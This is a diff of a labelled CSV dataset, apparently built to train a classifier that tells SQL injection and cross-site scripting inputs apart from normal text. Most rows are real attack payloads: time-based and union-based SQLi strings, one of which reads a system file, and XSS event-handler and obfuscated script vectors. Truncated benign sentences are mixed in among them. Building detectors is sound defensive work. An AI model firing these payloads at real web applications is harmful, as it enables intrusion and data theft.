DELAY '0:0:5'--,2,SQLi,11324 -"-7794"" ) union all select 3910,3910,3910,3910,3910",2,SQLi,12541 -Update status.,0,normal,23023 -1' ) or sleep ( 5 ) and ( 'mdmr' like 'mdmr,2,SQLi,13432 -1 ) and exp ( ~ ( select * from ( select concat ( ,2,SQLi,13403 -"1"" ) ) ) ( select ( case when ( 4587 = 4587 ) then",2,SQLi,18516 -Where did you find that serene beach?,0,normal,23825 -"1%"" ) ) ) union all select null,null,null,null--",2,SQLi,18906 -"Inspired by Le Select in Paris, The Select in Sand",0,normal,25986 -"-9891"" union all select 7489#",2,SQLi,20475 -"1"" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7",2,SQLi,19569 -More on how select companies performed when the da,0,normal,25876 -\u{61}lert(1),1,XSS,9396 --5820' ) ) as lkik where 4044 = 4044 or 7156 = 919,2,SQLi,20312 -"<title onmouseup=""alert(1)"">test</title>",1,XSS,6325 -or pg_SLEEP(5)#,2,SQLi,10394 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,12448 -&#000060;,1,XSS,9772 -1' and exp ( ~ ( select * from ( select concat ( 0,2,SQLi,12591 -ORDER BY 11--,2,SQLi,10253 -"UNION SELECT @@VERSION,SLEEP(5),""'3'""#",2,SQLi,10622 -"{""id"":null,""name"":""Syakomon""}",0,normal,26953 -"{""id"":null,""firstName"":""Ang"",""lastName"":""Freddie"",",0,normal,27046 -They ordered a pepperoni pie.,0,normal,23005 -"-5548' where 4477 = 4477 union all select 4477,447",2,SQLi,15668 -"<frameset oncut=""alert(1)"" contenteditable>test</f",1,XSS,7074 -"<meter onmousedown=""alert(1)"">test</meter>",1,XSS,7174 -"{""id"":null,""firstName"":""Kenneth"",""lastName"":""Kang""",0,normal,26858 -"1"" ) where 2278 = 2278",2,SQLi,16765 -"1%"" or sleep ( 5 ) #",2,SQLi,20179 -"1, ( select ( case when ( 3717 = 3717 ) then 1 els",2,SQLi,18572 -"<tfoot onmouseleave=""alert(1)"">test</tfoot>",1,XSS,7542 +select * from users where id = 1 or ( $+ ) = 1 uni,2,SQLi,11809 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10531 +Where should I insert data?,0,normal,23371 +<i onpointerleave=alert(1)>XSS</i>,1,XSS,4829 +1'|| ( select 'ylio' from dual where 3767 = 3767 a,2,SQLi,16870 +<footer onpointerleave=alert(1)>XSS</footer>,1,XSS,6177 +-4669 ) or 2452 = 1601#,2,SQLi,13723 +1' ) ) ) and 4386 = utl_inaddr.get_host_address ( ,2,SQLi,17843 +))) WAITFOR DELAY '0:0:5'--,2,SQLi,11326 +1' ) ) ) or ( select * from ( select ( sleep ( 5 ),2,SQLi,12543 +"1"" ) ) and 8148 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,21073 +1 ) where 5442 = 5442,2,SQLi,13434 +"1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71,",2,SQLi,13405 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,18514 +1' ) as nvqk where 3917 = 3917 or 1022 = ( select ,2,SQLi,15277 +1'+ ( select 'kiqf' where 5920 = 5920,2,SQLi,18904 +Filter results.,0,normal,23049 +"1"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""phcl"" ",2,SQLi,20838 +1' ) where 4277 = 4277 and 7756 = dbms_utility.sql,2,SQLi,19567 +Much attention has been paid recently to the culti,0,normal,25873 +&#97;lert(1),1,XSS,9398 +Where clause in SQL query.,0,normal,23454 +"<output onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,6327 +AnD SLEEP(5),2,SQLi,10396 +1 ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch,2,SQLi,12450 +“ onclick=alert(1)//<button ‘ onclick=alert(1)//> ,1,XSS,9774 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12593 +ORDER BY 13--,2,SQLi,10255 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10624 +"{""id"":null,""firstName"":""Raymond"",""lastName"":""Yi"",""",0,normal,26950 +Create a meme.,0,normal,22866 +They'll update the software.,0,normal,23002 +1' ) and 6510 = ( select count ( * ) from sysusers,2,SQLi,15660 +<command onpointerdown=alert(1)>XSS</command>,1,XSS,7076 +<a onpointerover=alert(1)>XSS</a>,1,XSS,7176 +-6202 ) ) or 7845 = 1962--,2,SQLi,20115 +"-2625' ) or elt ( 1032 = 1032,3623 ) and ( 'eliy' ",2,SQLi,16763 +"1 procedure analyse ( extractvalue ( 5840,concat (",2,SQLi,15365 +"1' and elt ( 2266 = 7467,7467 )",2,SQLi,18570 +<menu onpointerdown=alert(1)>XSS</menu>,1,XSS,7544 "<XSS STYLE=""xss:expression(javascript:alert(1))"">",1,XSS,764 -<option onpointerenter=alert(1)>XSS</option>,1,XSS,8496 -<blink onpointerdown=alert(1)>XSS</blink>,1,XSS,5925 -1%' ) or ( select 2* ( if ( ( select * from ( sele,2,SQLi,19536 -"1"" or 6979 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,14881 -"-8725"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( ""v",2,SQLi,21750 -"<content onbeforepaste=""alert(1)"" contenteditable>",1,XSS,5067 -"<meter onpaste=""alert(1)"" contenteditable>test</me",1,XSS,6841 -"<article draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,7595 -1' ) ( select ( case when ( 4587 = 4587 ) then reg,2,SQLi,16016 --1765' ) order by 1--,2,SQLi,12732 -"<ruby onmouseup=""alert(1)"">test</ruby>",1,XSS,2770 -1,0,normal,26695 -"<thead onkeydown=""alert(1)"" contenteditable>test</",1,XSS,1954 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,13588 -1'|| ( select 'ssvp' where 3300 = 3300 or 2367 = (,2,SQLi,20519 -")) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337",2,SQLi,11248 -She picked up a package from the post office.,0,normal,23905 -"1%' or 6979 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,22179 -"-5817' in boolean mode ) union all select 2391,239",2,SQLi,20740 -"<keygen onmouseenter=""alert(1)"">test</keygen>",1,XSS,8508 --6014' ) ) or ( 9860 = 4848 ) *4848 and ( ( 'qtge',2,SQLi,20404 -<tt id=x tabindex=1 onfocus=alert(1)></tt>,1,XSS,4121 -"{""id"":null,""firstName"":""Debbie"",""lastName"":""Erqie""",0,normal,27513 -"1"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,14702 -</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMA,1,XSS,9760 -<body>Hello</body>,1,XSS,9087 -1'|| ( select 'hwdj' where 8179 = 8179,2,SQLi,14279 -"select * from users where id = 1 or "" ( @"" or 1 = ",2,SQLi,11576 +<dl onpointerdown=alert(1)>XSS</dl>,1,XSS,8498 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5927 +1%' ) rlike ( select * from ( select ( sleep ( 5 ),2,SQLi,19248 +Select upgrade.,0,normal,24616 +( select ( case when ( 9337 = 9337 ) then waitfor ,2,SQLi,21748 +"<picture onmouseup=""alert(1)"">test</picture>",1,XSS,5069 +<table id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,6843 +"<strong onmousedown=""alert(1)"">test</strong>",1,XSS,7597 +1' and 4386 = utl_inaddr.get_host_address ( chr ( ,2,SQLi,19783 +"1%"" ) ) and 8148 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,12734 +<mark onblur=alert(1) tabindex=1 id=x></mark><inpu,1,XSS,2771 +1,0,normal,26692 +<abbr onpointermove=alert(1)>XSS</abbr>,1,XSS,1955 +-7786' ) ) or 9323 = 9323#,2,SQLi,13590 +"-8159 where 2793 = 2793 union all select 2793,2793",2,SQLi,19464 +"AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337",2,SQLi,11250 +I will select the best outfit for the party tonigh,0,normal,23902 +1 ) where 1120 = 1120,2,SQLi,22177 +"{""id"":null,""name"":""hidden""}",0,normal,26962 +<sub onpointerdown=alert(1)>XSS</sub>,1,XSS,8510 +"1"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,18894 +<small onpointerover=alert(1)>XSS</small>,1,XSS,4123 +"-7950 where 9619 = 9619 union all select 9619,9619",2,SQLi,20005 +Where's the martial arts dojo?,0,normal,23601 +"<SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTM",1,XSS,9762 +<br/><hr/>jAvascript:alert('Top Page Location: '+d,1,XSS,9089 +select ( case when ( 9816 = 1693 ) then 9816 else ,2,SQLi,14281 +select * from users where id = '1' union select \#,2,SQLi,11578 "{""id"":null,""firstName"":""Mark"",""lastName"":""Taylor"",",0,normal,27502 -<style>:target {color:red;}</style><button id=x st,1,XSS,4909 -"><iframe%20src=""http://google.com""%%203E",1,XSS,9574 +"<slot onmouseup=""alert(1)"">test</slot>",1,XSS,4911 +<button onActivate=javascript:alert(1)>,1,XSS,9576 <script\x0C>javascript:alert(1)</script>,1,XSS,606 <audio controls autoplay onended=alert(1)><source ,1,XSS,16 --6109 union all select 6784--,2,SQLi,17543 -"<details onmouseout=""alert(1)"">test</details>",1,XSS,6413 -Extra 20% off select items with code SAVER (throug,0,normal,26202 -"1' where 7125 = 7125 or elt ( 6272 = 6272,sleep ( ",2,SQLi,15651 -"xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(""XSS""))",1,XSS,9757 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5767 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3050 -<wbr onpointerleave=alert(1)>XSS</wbr>,1,XSS,7729 -"<embed draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,3953 -The Financials Select Sector SPDR Fund (XLF) close,0,normal,25444 +1' ) as yuqv where 6007 = 6007 or extractvalue ( 1,2,SQLi,17541 +"<dialog draggable=""true"" ondragend=""alert(1)"">test",1,XSS,6415 +"Facebook pays select partners, including Mashable,",0,normal,26199 +"1"" ) ) ) and 9660 = ( select count ( * ) from all_",2,SQLi,15643 +"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDAT",1,XSS,9759 +"<option draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,5769 +<source id=x tabindex=1 onactivate=alert(1)></sour,1,XSS,3051 +<wbr id=x tabindex=1 onfocus=alert(1)></wbr>,1,XSS,7731 +<rtc onpointerout=alert(1)>XSS</rtc>,1,XSS,3955 +"1%' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a47",2,SQLi,15133 "<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""h",1,XSS,310 -1'+ ( select luwn where 1214 = 1214 union all sele,2,SQLi,13657 -<button onUndo=javascript:alert(1)>,1,XSS,9676 -%22write('<script>alert(1)</script>')%22,1,XSS,9446 -<hr id=x tabindex=1 onactivate=alert(1)></hr>,1,XSS,1879 -The primary goal of 1970s FISA reform was to creat,0,normal,25388 -"1%' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( '%'",2,SQLi,16574 -1'|| ( select 'zccb' from dual where 8911 = 8911,2,SQLi,14229 -<marquee/onstart=alert()>,1,XSS,1150 -1' and 6510 = ( select count ( * ) from sysusers a,2,SQLi,21810 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2518 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,16942 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,17111 -"1' ) ) ) union all select null,null--",2,SQLi,20045 -"<u ondblclick=""alert(1)"">test</u>",1,XSS,2129 +"-7235"" ) union all select 4624,4624,4624,4624,4624",2,SQLi,13659 +<button seekSegmentTime=javascript:alert(1)>,1,XSS,9678 +alert(document.domain),1,XSS,9448 +<style>:target {color:red;}</style><embed id=x sty,1,XSS,1880 +-2745 ) ) as aywp where 9735 = 9735 or 5903 = ( 'q,2,SQLi,16680 +"1%' ) ) and make_set ( 6527 = 9529,9529 ) and ( ( ",2,SQLi,16572 +"-3819' ) ) ) union all select 9014,9014,9014,9014,",2,SQLi,14231 +<video/poster/onerror=alert()>,1,XSS,1151 +1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr,2,SQLi,21808 +"<ol draggable=""true"" ondrag=""alert(1)"">test</ol>",1,XSS,2519 +select ( case when ( 3435 = 4011 ) then 1 else 343,2,SQLi,16940 +"1%"" ) union all select null,null,null--",2,SQLi,19889 +"1%' ) and 8148 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,20043 +"<td onmouseover=""alert(1)"">test</td>",1,XSS,2130 <style>*{x:expression(javascript:alert(1))}</style,1,XSS,703 -1 ) as bzuh where 8041 = 8041 and 6307 = 9200#,2,SQLi,18321 -<link onfocus=alert(1) id=x tabindex=1 style=displ,1,XSS,4867 -"<dialog onkeypress=""alert(1)"" contenteditable>test",1,XSS,3675 -<style>:target {color:red;}</style><meter id=x sty,1,XSS,3843 -1 ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +,2,SQLi,16265 -Where's your SQL duty?,0,normal,23428 -"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:&#101;x&#x",1,XSS,1112 -"{""id"":null,""firstName"":""Ivy"",""lastName"":""Lim"",""spe",0,normal,27193 -"{""id"":null,""firstName"":""Jin Le Joyce"",""lastName"":""",0,normal,27176 -"1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,15421 -"<style>@keyframes x{}</style><rtc style=""animation",1,XSS,8091 +1 and 8514 = ( select count ( * ) from domain.doma,2,SQLi,19680 +<style>:target {color:red;}</style><track id=x sty,1,XSS,4869 +<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><in,1,XSS,3677 +<frameset onpointermove=alert(1)>XSS</frameset>,1,XSS,3845 +1 ) ) ) and 8189 = ( select count ( * ) from sysib,2,SQLi,16257 +Join us tonight for a fantastic dinner.,0,normal,22898 +"a=""get"";b=""URL(ja\"""";c=""vascr"";d=""ipt:ale"";e=""rt('",1,XSS,1113 +1' ) ) ) or 8421 = ( select count ( * ) from gener,2,SQLi,19777 +Select the right colors for the artwork.,0,normal,24188 +Where's your SQL data?,0,normal,23415 +"<tr draggable=""true"" ondragend=""alert(1)"">test</tr",1,XSS,8093 "<embed src=""data:text/html;base64,%(base64)s"">",1,XSS,638 -"<noscript onmouseleave=""alert(1)"">test</noscript>",1,XSS,8441 -"<i ondblclick=""alert(1)"">test</i>",1,XSS,2407 -"1"" ) or 7417 = ( select count ( * ) from sysibm.sy",2,SQLi,15010 --9311 ) ) or ( 5065 = 2572 ) *2572 and ( ( 1199 = ,2,SQLi,14906 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6747 -<pre id=x tabindex=1 onbeforeactivate=alert(1)></p,1,XSS,8889 -><script+src=https://www.travelpayouts.com/widgets,1,XSS,9815 -) or sleep(__TIME__)=',2,SQLi,10079 -"1"" ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,19047 -) or ('1'='1'--,2,SQLi,9982 -<li id=x tabindex=1 onbeforeactivate=alert(1)></li,1,XSS,2229 -Let's explore where the walking trail leads.,0,normal,23873 -select,0,normal,26584 -Select your study.,0,normal,24991 -"<em oncut=""alert(1)"" contenteditable>test</em>",1,XSS,5770 -"<legend draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,5613 -Select your trade.,0,normal,25050 -"<noscript onmousedown=""alert(1)"">test</noscript>",1,XSS,5456 -"<tbody draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,7880 -"<noframes draggable=""true"" ondragenter=""alert(1)"">",1,XSS,7687 +<style onpointerdown=alert(1)>XSS</style>,1,XSS,8443 +<video onfocusout=alert(1) tabindex=1 id=x></video,1,XSS,2408 +"-5097' ) union all select 8992,8992,8992,8992,8992",2,SQLi,15003 +Delete the expired coupons.,0,normal,22598 +"<link onclick=""alert(1)"">test</link>",1,XSS,6749 +<body onfocusout=alert(1) id=x><iframe id=x>,1,XSS,8891 +><script+src=https://adserver.adtechus.com/pubapi/,1,XSS,9817 +hi' or 'a'='a,2,SQLi,10081 +1 ) ) ) and sleep ( 5 ) #,2,SQLi,19045 +) or ('1'='1'#,2,SQLi,9984 +<object onpointerout=alert(1)>XSS</object>,1,XSS,2230 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,18834 +1' where 8869 = 8869 and 8312 = dbms_pipe.receive_,2,SQLi,17659 +1 ) ) as hxtp where 5478 = 5478 and 8594 = ( selec,2,SQLi,18791 +<applet id=x tabindex=1 onfocusin=alert(1)></apple,1,XSS,5772 +"<body onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,5615 +Select your substitute.,0,normal,25047 +"<frameset onbeforepaste=""alert(1)"" contenteditable",1,XSS,5458 +"<summary oncopy=""alert(1)"" contenteditable>test</s",1,XSS,7882 +"<pre ondblclick=""alert(1)"">test</pre>",1,XSS,7689 <form><input oninvalid=alert(1) required><input ty,1,XSS,71 -` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11226 -"<mark draggable=""true"" ondrag=""alert(1)"">test</mar",1,XSS,7879 -"<option draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,5769 -"<IMG SRC=x onoffline=""alert(String.fromCharCode(88",1,XSS,1179 -"1"" ) rlike sleep ( 5 ) and ( ""efoq"" like ""efoq",2,SQLi,16566 -"-4993"" union all select 6959,6959,6959--",2,SQLi,19618 -Select verify.,0,normal,24567 -));waitfor delay '0:0:__TIME__'--,2,SQLi,10084 -"-1947 union all select 7780,7780,7780,7780,7780,77",2,SQLi,19522 -<style>:target {color:red;}</style><object id=x st,1,XSS,7378 -"<code onmouseout=""alert(1)"">test</code>",1,XSS,2011 -1 or 2367 = ( select count ( * ) from rdb$fields a,2,SQLi,15006 -1 ) where 3381 = 3381 and 3754 = ( select upper ( ,2,SQLi,21431 -"AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND 13",2,SQLi,11307 -Select a workout that challenges you.,0,normal,24002 -1' ) ) as ewyk where 4828 = 4828 and ( select 2* (,2,SQLi,14618 -declare @q nvarchar (200) 0x730065006c006500630074,2,SQLi,10191 -1' ) and 3754 = ( select upper ( xmltype ( chr ( 6,2,SQLi,20280 -"1%' and 3824 = benchmark ( 5000000,md5 ( 0x7655564",2,SQLi,15780 -"1%' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c",2,SQLi,17188 -"<var onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,1903 -ORDER BY 9#,2,SQLi,10282 -Ideally the parents can select the numbers and cre,0,normal,26062 -Where did you discover that hidden treasure?,0,normal,23966 -<nav onpointerup=alert(1)>XSS</nav>,1,XSS,3760 +RLIKE SLEEP(5) AND '1337'='1337,2,SQLi,11228 +"<spacer oncut=""alert(1)"" contenteditable>test</spa",1,XSS,7881 +"<code oncopy=""alert(1)"" contenteditable>test</code",1,XSS,5771 +"<IMG SRC=x onpagehide=""alert(String.fromCharCode(8",1,XSS,1180 +"1"" ) as oijn where 1521 = 1521 and 3580 = ( select",2,SQLi,22294 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19616 +Select decide.,0,normal,24564 +"1;(load_file(char(47,101,116,99,47,112,97,115, ...",2,SQLi,10086 +1' ) ) as pdrg where 5960 = 5960 and 9198 = 9198--,2,SQLi,19520 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7380 +<option onpointerout=alert(1)>XSS</option>,1,XSS,2012 +1'+ ( select iaeu where 5509 = 5509 or 8514 = benc,2,SQLi,22125 +"-4694' ) where 1501 = 1501 union all select 1501,1",2,SQLi,21429 +) IF (1=1) WAITFOR DELAY '0:0:5'--,2,SQLi,11309 +-8181' ) ) or 5926 = 3332#,2,SQLi,20124 +"-8186%' or elt ( 1032 = 1032,3623 ) and '%' = '",2,SQLi,14620 + or 1=1 --,2,SQLi,10193 +1 ) ) as qfnu where 1609 = 1609 and 8189 = ( selec,2,SQLi,20278 +1' ) ) ) or ( select 9173 from ( select count ( * ,2,SQLi,15772 +"1"" and ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,17186 +<article id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,1904 +ORDER BY 11#,2,SQLi,10284 +If Beale Street Could Talk hits select theaters on,0,normal,26059 +"{""id"":null,""firstName"":""Zi"",""lastName"":""Jian"",""spe",0,normal,26833 +"<style>@keyframes slidein {}</style><track style=""",1,XSS,3762 "{""id"":null,""name"":""score""}",0,normal,27443 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6250 -"<tfoot onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,6048 +"<image onmouseenter=""alert(1)"">test</image>",1,XSS,6252 +<plaintext onpointerdown=alert(1)>XSS</plaintext>,1,XSS,6050 "{""id"":null,""name"":""plan it""}",0,normal,27558 -"<figcaption onbeforepaste=""alert(1)"" contenteditab",1,XSS,2958 -Select a quote to reflect your mood.,0,normal,24248 -"select * from generate_series ( 7762,7762,case whe",2,SQLi,19318 -if ( 6647 = 2179 ) select 6647 else drop function ,2,SQLi,17123 -"{""id"":null,""firstName"":""Su"",""lastName"":""Krishnan"",",0,normal,26870 -1%' ) ) ) or ( select 2* ( if ( ( select * from ( ,2,SQLi,21890 -"<span onpaste=""alert(1)"" contenteditable>test</spa",1,XSS,6908 -<%tag style=”xss:expression(alert(‘XSS’))”>,1,XSS,9752 -"1' or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,21410 -"-4300"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr",2,SQLi,19183 -"In the drop-down menu, select ""Backup and Restore ",0,normal,25997 -1'|| ( select 'feyg' from dual where 7734 = 7734 a,2,SQLi,16624 -<font onpointerover=alert(1)>XSS</font>,1,XSS,7079 -"<div id=""126""><object id=""x"" classid=""clsid:CB927D",1,XSS,9115 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,12074 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2959 +"{""id"":null,""name"":""Woobat""}",0,normal,27450 +"-3228"" ) or ( 5901 = 1570 ) *1570 and ( ""egdd"" = """,2,SQLi,19316 +1 ) ) as ztcn where 1043 = 1043 and 6305 = 5785--,2,SQLi,17347 +"1 ) where 5336 = 5336 union all select null,null,n",2,SQLi,16099 +"1"" ) ) as czzg where 5483 = 5483 and exp ( ~ ( sel",2,SQLi,21888 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6910 +"</b style=""expr/**/ession(alert('vulnerable'))"">",1,XSS,9754 +1' in boolean mode ) or 4411 = ( select count ( * ,2,SQLi,18375 +"-6642' ) where 3459 = 3459 union all select 3459,3",2,SQLi,19181 +"In the new window that opens, select the ""View"" ta",0,normal,25994 +"1', ( select ( case when ( 8640 = 8640 ) then ( as",2,SQLi,18809 +<img2 onpointerdown=alert(1)>XSS</img2>,1,XSS,7081 +"<div id=""128""><svg><style>&lt;img/src=x onerror=al",1,XSS,9117 +"select * from users where id = 1 or 1#""{ union sel",2,SQLi,12076 <IMG SRC=”javascript:alert(‘XSS’)”,1,XSS,945 -"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(",2,SQLi,11016 -"-9405' ) union all select 8283,8283,8283,8283--",2,SQLi,18440 -Then select Settings > Account settings > General ,0,normal,25342 -<body onfocusout=alert(1) id=x><iframe id=x>,1,XSS,8891 -)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) A,2,SQLi,11196 -"-8358' ) ) ) union all select 7282,7282--",2,SQLi,20281 -"1, ( select 2* ( if ( ( select * from ( select con",2,SQLi,20402 -Stearns and Foster: Up to $600 off select mattress,0,normal,25522 -1'+ ( select xzse where 4530 = 4530,2,SQLi,18077 -"<caption onbeforecut=""alert(1)"" contenteditable>te",1,XSS,5978 -hi' ) or ( 'a' = 'a,2,SQLi,11521 -"admin"" or ""1"" = ""1",2,SQLi,11831 -"<center onpaste=""alert(1)"" contenteditable>test</c",1,XSS,8063 -"1"" ) ) as tsry where 6594 = 6594 or row ( 1045,756",2,SQLi,19329 -Where's the RV park?,0,normal,23553 -<button onURLFlip=javascript:alert(1)>,1,XSS,9675 -<style>:target {color:red;}</style><aside id=x sty,1,XSS,8560 -"From the mass thrown out by the blast, or loosened",0,normal,26158 -"1' ) where 2284 = 2284 and make_set ( 8403 = 8403,",2,SQLi,20403 -"{""id"":null,""name"":""grow""}",0,normal,27168 -\u0061lert(1),1,XSS,9397 -"1%"" union all select null,null,null--",2,SQLi,15422 -<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#,1,XSS,1153 -"1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,15514 -1 ) ) as amyr where 7875 = 7875 or char ( 119 ) ||,2,SQLi,13787 -<svg><li onload=alert(1)></li>,1,XSS,2219 -)) waitfor delay '0:0:20' --,2,SQLi,10928 -<track onpointermove=alert(1)>XSS</track>,1,XSS,4314 -"<head oncopy=""alert(1)"" contenteditable>test</head",1,XSS,6275 -The organization provides an up-to-the minute fina,0,normal,25402 -<x onmouseout=alert(1)>hover this!,1,XSS,9353 -Where's the lake?,0,normal,23517 -France is leading the process to select a European,0,normal,26165 -OR x=y#,2,SQLi,10205 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#",2,SQLi,10808 -<nextid onpointerup=alert(1)>XSS</nextid>,1,XSS,6788 -"<tfoot draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,2475 -"<u draggable=""true"" ondragend=""alert(1)"">test</u>",1,XSS,6766 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2946 -"<script>alert(document.head.innerHTML.substr(146,2",1,XSS,9286 -"<option oncut=""alert(1)"" contenteditable>test</opt",1,XSS,3189 -"<em draggable=""true"" ondrag=""alert(1)"">test</em>",1,XSS,5564 -"1%' ) ) union all select null,null,null,null--",2,SQLi,20525 -Select the top priority.,0,normal,24303 -1 and 3707 = ( select count ( * ) from sysibm.syst,2,SQLi,22419 -You have only three options to select.,0,normal,25071 +"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(",2,SQLi,11018 +How did you select which women to feature in the d,0,normal,26080 +"1, ( select ( case when ( 4828 = 2600 ) then 1 els",2,SQLi,15994 +<style>@keyframes slidein {}</style><hgroup style=,1,XSS,8893 +%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) A,2,SQLi,11198 +Where's the zoo?,0,normal,23514 +"-8308"" ) union all select 3084,3084,3084,3084,3084",2,SQLi,20400 +1' where 1017 = 1017 and 7756 = dbms_utility.sqlid,2,SQLi,16361 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,21217 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5980 +"admin"" or 1 = 1",2,SQLi,11523 +""" ) ) or sleep ( __TIME__ ) = """,2,SQLi,11833 +<tr id=x tabindex=1 onfocusin=alert(1)></tr>,1,XSS,8065 +"It is also important to select leafy growths, and ",0,normal,25970 +Where's the inn?,0,normal,23550 +<button onUnload=javascript:alert(1)>,1,XSS,9677 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8562 +"From there, Sweetgreen delivers to that location a",0,normal,26155 +select ( case when ( 6047 = 8897 ) then 6047 else ,2,SQLi,20401 +"{""id"":null,""firstName"":""Bang Joni"",""lastName"":""Jan",0,normal,27166 +&#x61;lert(1),1,XSS,9399 +1' ) where 4949 = 4949,2,SQLi,15414 +&#39;&#88;&#83;&#83;&#39;&#41;>,1,XSS,1154 +Where's the nearest Starbucks?,0,normal,23506 +"-4236 ) union all select 5260,5260,5260,5260,5260,",2,SQLi,13789 +<iframe onpointerleave=alert(1)>XSS</iframe>,1,XSS,2220 +))) waitfor delay '0:0:20' --,2,SQLi,10930 +<style>:target {color: red;}</style><em id=x style,1,XSS,4316 +"<big onmouseover=""alert(1)"">test</big>",1,XSS,6277 +The parents and guardians were called upon to sele,0,normal,25399 +<x onmouseup=alert(1)>click this!,1,XSS,9355 +-2055 ) or 3038 = 3038,2,SQLi,21351 +From the corner of her eye she saw Keaton select a,0,normal,26162 +OR x=x--,2,SQLi,10207 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#",2,SQLi,10810 +"<label draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,6790 +"<form onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,2476 +<span id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,6768 +"<main oncopy=""alert(1)"" contenteditable>test</main",1,XSS,2947 +<script>alert(“XSS”);</script>,1,XSS,9288 +<tbody id=x tabindex=1 onfocus=alert(1)></tbody>,1,XSS,3191 +<figcaption id=x tabindex=1 onfocusin=alert(1)></f,1,XSS,5566 +"1%"" and 8407 = ( select count ( * ) from generate_",2,SQLi,15353 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,20094 +"1"" ) ) ) and 8407 = ( select count ( * ) from gene",2,SQLi,22417 +You only have two options to select.,0,normal,25068 <script>eval('\x61lert(1)')</script>,1,XSS,185 -"1"" ) ) or ( select 2* ( if ( ( select * from ( sel",2,SQLi,15786 -1 waitfor delay '0:0:10'--,2,SQLi,10075 --6512'+ ( select 'zdjx' where 5454 = 5454 order by,2,SQLi,19961 -perl -e &apos;print &quot;&lt;IMG SRC=java\0script,1,XSS,1441 -"1"" where 7371 = 7371 waitfor delay '0:0:5'--",2,SQLi,20523 -"-5202 union all select 5332,5332,5332,5332,5332,53",2,SQLi,18564 -select ( case when ( 9103 = 9836 ) then 9103 else ,2,SQLi,19809 -"1"" ) ( select ( case when ( 5451 = 5451 ) then reg",2,SQLi,12495 